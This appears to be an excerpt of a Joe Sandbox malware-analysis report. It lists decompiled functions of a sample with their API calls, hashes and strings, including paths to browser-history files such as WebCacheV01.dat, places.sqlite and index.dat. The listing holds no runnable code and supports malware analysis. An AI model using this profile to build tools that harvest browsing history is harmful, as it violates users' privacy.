                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressHandleModuleProcProcessTimes
                                                                    • String ID: GetProcessTimes$kernel32.dll
                                                                    • API String ID: 1714573020-3385500049
                                                                    • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                    • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                    • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                    APIs
                                                                    • memset.MSVCRT ref: 004087D6
                                                                      • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                      • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                    • memset.MSVCRT ref: 00408828
                                                                    • memset.MSVCRT ref: 00408840
                                                                    • memset.MSVCRT ref: 00408858
                                                                    • memset.MSVCRT ref: 00408870
                                                                    • memset.MSVCRT ref: 00408888
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                    • String ID:
                                                                    • API String ID: 2911713577-0
                                                                    • Opcode ID: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                    • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                    • Opcode Fuzzy Hash: 6684bba834465d20886231ffe2d62564197a18c1a2325da43f028315e65dbcab
                                                                    • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memcmp
                                                                    • String ID: @ $SQLite format 3
                                                                    • API String ID: 1475443563-3708268960
                                                                    • Opcode ID: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                    • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                    • Opcode Fuzzy Hash: bc797f5c287fbec082bfe36368e8bdb92b626008a1b8340b8f00afaa449410d4
                                                                    • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: _wcsicmpqsort
                                                                    • String ID: /nosort$/sort
                                                                    • API String ID: 1579243037-1578091866
                                                                    • Opcode ID: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                    • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                    • Opcode Fuzzy Hash: a0f12cb90dd745c164ef67684cb79943b88980d13b6e843c418957b63f9314a7
                                                                    • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                    APIs
                                                                    • memset.MSVCRT ref: 0040E60F
                                                                    • memset.MSVCRT ref: 0040E629
                                                                      • Part of subcall function 00414C2E: SHGetSpecialFolderPathW.SHELL32(00000000,?,0000001A,00000000,?,00000000), ref: 00414C68
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                    Strings
                                                                    • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                    • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcslen$AttributesFileFolderPathSpecialwcscatwcscpy
                                                                    • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                    • API String ID: 2887208581-2114579845
                                                                    • Opcode ID: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                    • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                    • Opcode Fuzzy Hash: 45b77cc57d7adabb6b76daf53bfb3be083a41c4971f5e6ab387fbe8a56a2d209
                                                                    • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                    APIs
                                                                    • FindResourceW.KERNELBASE(?,?,?), ref: 004148C3
                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 004148D4
                                                                    • LoadResource.KERNEL32(?,00000000), ref: 004148E4
                                                                    • LockResource.KERNEL32(00000000), ref: 004148EF
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                    • String ID:
                                                                    • API String ID: 3473537107-0
                                                                    • Opcode ID: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction ID: 8a72e2f5d7590eb6bb033c3ed88c96ec9d5eb8bcd973c23d1c6560583cb0a60d
                                                                    • Opcode Fuzzy Hash: 6eac18842e5c85fe8f5858b83388748d76eef83a8f56414f10f835c55d74c1c4
                                                                    • Instruction Fuzzy Hash: 0101D2727402156B8B294FB6DD4999BBFAEFFC6391308803AF809D6331DA31C851C688
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@
                                                                    • String ID:
                                                                    • API String ID: 613200358-0
                                                                    • Opcode ID: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction ID: aa45652f999bbb0892b85dcd7393972dd4dfe4e89c7b59a5f1a68188070d07e1
                                                                    • Opcode Fuzzy Hash: 51118905c2728d810469e0c59db0571482045495d4d228400e43909190034b47
                                                                    • Instruction Fuzzy Hash: 5EE08C60F0830052BA31EBBABD40E2723EC5E1AB4271A842FB905C3282CE2CC880C02D
                                                                    APIs
                                                                    Strings
                                                                    • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memset
                                                                    • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                    • API String ID: 2221118986-1725073988
                                                                    • Opcode ID: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                    • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                    • Opcode Fuzzy Hash: d115b1de85cb0c2c74241db9f2e26d4ca9f76d3b3ab36ed3aa85b1754c3cbe0d
                                                                    • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                    APIs
                                                                    • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                    • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,0045DBC0,00417C24,00000008,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ChangeCloseFindNotificationSleep
                                                                    • String ID: }A
                                                                    • API String ID: 1821831730-2138825249
                                                                    • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                    • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                    • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@DeleteObject
                                                                    • String ID: r!A
                                                                    • API String ID: 1103273653-628097481
                                                                    • Opcode ID: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                    • Instruction ID: d381ae2e1f6c469d4091c7bd434485f036f098756071eb86a226830a39d2e28c
                                                                    • Opcode Fuzzy Hash: 35011d0761a793af9b86058f165b74ada9e8dfd6de6a99c5cda2ffee1e56a26e
                                                                    • Instruction Fuzzy Hash: 72E04F75000302DFD7115F26E400782B7F5FF85315F11455EE89497151EBB96164CE19
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??2@
                                                                    • String ID:
                                                                    • API String ID: 1033339047-0
                                                                    • Opcode ID: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                    • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                    • Opcode Fuzzy Hash: bb5a2cedd882201272bd117211a6380788fbbee7b2a1ea69d9384cb42441e8af
                                                                    • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49
                                                                    APIs
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                      • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                    • memcmp.MSVCRT ref: 00444BA5
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc$memcmp
                                                                    • String ID: $$8
                                                                    • API String ID: 2808797137-435121686
                                                                    • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                    • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                    • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                    APIs
                                                                      • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                      • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                      • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                      • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                      • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                      • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                      • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                      • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                      • Part of subcall function 0040E01E: FindCloseChangeNotification.KERNELBASE(?), ref: 0040E13E
                                                                    • FindCloseChangeNotification.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                      • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                      • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                      • Part of subcall function 0040E2AB: memcpy.MSVCRT ref: 0040E3EC
                                                                    • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                    • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                      • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                      • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                      • Part of subcall function 0040E175: ??3@YAXPAX@Z.MSVCRT ref: 0040E28B
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: File$Close$ChangeFindHandleNotificationProcessViewmemset$??3@CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintfmemcpywcschr
                                                                    • String ID:
                                                                    • API String ID: 1042154641-0
                                                                    • Opcode ID: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                    • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                    • Opcode Fuzzy Hash: db5b060151050967cb8a3560fbfd23956168ef1b290a982d56d7add8c3b4651d
                                                                    • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                    APIs
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                      • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                      • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                    • memset.MSVCRT ref: 00403A55
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                      • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                      • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                      • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                      • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,0040DAEA,?,0040DBA1,00000000,?,00000000,00000208,?), ref: 00409B9C
                                                                      • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A908
                                                                      • Part of subcall function 0040A8D0: ??3@YAXPAX@Z.MSVCRT ref: 0040A92B
                                                                      • Part of subcall function 0040A8D0: memcpy.MSVCRT ref: 0040A94F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: memsetwcscatwcslen$??3@$AttributesFilememcpywcscpy
                                                                    • String ID: history.dat$places.sqlite
                                                                    • API String ID: 3093078384-467022611
                                                                    • Opcode ID: a01d5a0bee3624da2b377d1157346e33285ff4c412796400345af8a8e796aa53
                                                                    • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                    • Opcode Fuzzy Hash: a01d5a0bee3624da2b377d1157346e33285ff4c412796400345af8a8e796aa53
                                                                    • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                    APIs
                                                                      • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                      • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                    • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                    • GetLastError.KERNEL32 ref: 00417627
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$File$PointerRead
                                                                    • String ID:
                                                                    • API String ID: 839530781-0
                                                                    • Opcode ID: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                    • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                    • Opcode Fuzzy Hash: 43cd8d8e6b63bda72f55cb56ee55d1ec8e5478229177a04f989a23650c495d71
                                                                    • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: FileFindFirst
                                                                    • String ID: *.*$index.dat
                                                                    • API String ID: 1974802433-2863569691
                                                                    • Opcode ID: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                    • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                    • Opcode Fuzzy Hash: 357f5a483d779ef34e4c4d87daa9b3f5529f5b59003a03b6604f1343cb38d30a
                                                                    • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.2197675515.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.2197675515.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    • Associated: 00000004.00000002.2197675515.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_17220015066e9475efc6df52db0521bbe1501b782223eb28324fcb835a5fc91b660934.jbxd
                                                                    Similarity
                                                                    • API ID: ??3@mallocmemcpy
                                                                    • String ID:
                                                                    • API String ID: 3831604043-0
                                                                    • Opcode ID: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                    • Instruction ID: 1240433d41d023da9ba75aa62d017d874606d7cfbee4c78203c9aa8101697722
                                                                    • Opcode Fuzzy Hash: a8c2b4a2abbe370f156afd1ac3a64450955b5e367f985048e5f3f029e510ba1a
                                                                    • Instruction Fuzzy Hash: 88F0E9727092219FC708AE75A98180BB79DAF55314B12482FF404E3282D7389C50CB58
                                                                    APIs
                                                                    • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                    • GetLastError.KERNEL32 ref: 004175A2
